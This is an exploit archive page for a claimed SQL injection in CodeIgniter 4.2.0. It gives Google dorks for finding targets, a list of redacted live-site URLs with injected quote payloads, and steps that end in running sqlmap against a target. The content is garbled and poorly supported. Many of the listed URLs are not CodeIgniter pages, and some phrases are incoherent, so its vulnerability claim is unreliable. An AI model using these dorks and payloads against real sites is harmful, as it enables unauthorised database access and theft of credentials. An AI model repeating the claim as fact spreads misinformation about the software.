exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CodeIgniter CMS 4.2.0 SQL Injection

CodeIgniter CMS 4.2.0 SQL Injection
Posted Aug 1, 2022
Authored by E1.Coders

CodeIgniter CMS version 4.2.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 95b28e947fb52c82785b9e221438f8e9b78449cd4019acccc826a0cac2e8875e

CodeIgniter CMS 4.2.0 SQL Injection

Change Mirror Download
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]Exploit Title : CodeIgniter CMS Version 4.2.0 Sql Injection Vulnerability
[+]
[+]Exploit Author : E1.Coders
[+]
[+]Vendor Homepage : https://www.codeigniter.com/
[+]
[+]Google Dork ONE : searchResult/?title=
[+]
[+]Google Dork Two : Job/searchResult/?title=
[+]
[+]Date : 15 / 05 / 2022
[+]
[+]Tested On : windows + linux
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION <~ ~ ~
[+]
[+] CodeIgniter CMS suffers from a remote SQL injection vulnerability.
[+] "codeigniter vulnerability ::$DATA view source code"
[+] Note that this find contains information about the site.
[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.
[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.
[+] The following URLs and parameters have been confirmed to suffer from SQL injection.
[+]
[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> Location <~ ~ ~
[+] SQL ERROR Location
[+] https://www.site.com/Job/searchResult/?title=[SQL]
[+]
[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~> DEMO <~ ~ ~
[+]
[+]
[+] ERROR : https://[removed].com/Job/searchResult/?title=123%27
[+]
[+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF' (OR= or ==)
[+]
[+] ERROR : https://[removed].ir/?per_page=400%2
[+]
[+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0
[+]
[+] ERROR : https://[removed].com/login/ (username = ' Password = ')
[+]
[+] ERROR : https://[removed].com/search.php?search=1'
[+]
[+] ERROR : https://[removed].com/news.php?p=7251'
[+]
[+] ERROR : https://[removed].com/employe/show.php?cvid=14088'
[+]
[+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'
[+]
[+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1
[+]
[+] ERROR : https://[removed].com/fa/FormView/1026'
[+]
[+] ERROR : https://[removed].com/fa/formview/1030'

[+] And Google More . . . \ .
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Methode Attack :
[+]
[+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks
[+]
[+] Step 2 : Add a variable " OR ' to the end of the URL "request"
[+] To display the PHP error related to not controlling the functions that cause the attacker to attack '
[+]
[+] Step 3 : Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] About CMS :
[+]
[+] Codeigniter is an open source web software framework used to build dynamic websites.
[+] This framework, which is written in PHP language,
[+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries,
[+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Explanation of vulnerability :
[+]
[+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack
[+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map.
[+]
[+] All different parts of the site have this security problem
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Solution :
[+]
[+]
[+] Use parameter input validation to be modified to prevent attacks
[+] "codeigniter vulnerability ::$DATA view source code"
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close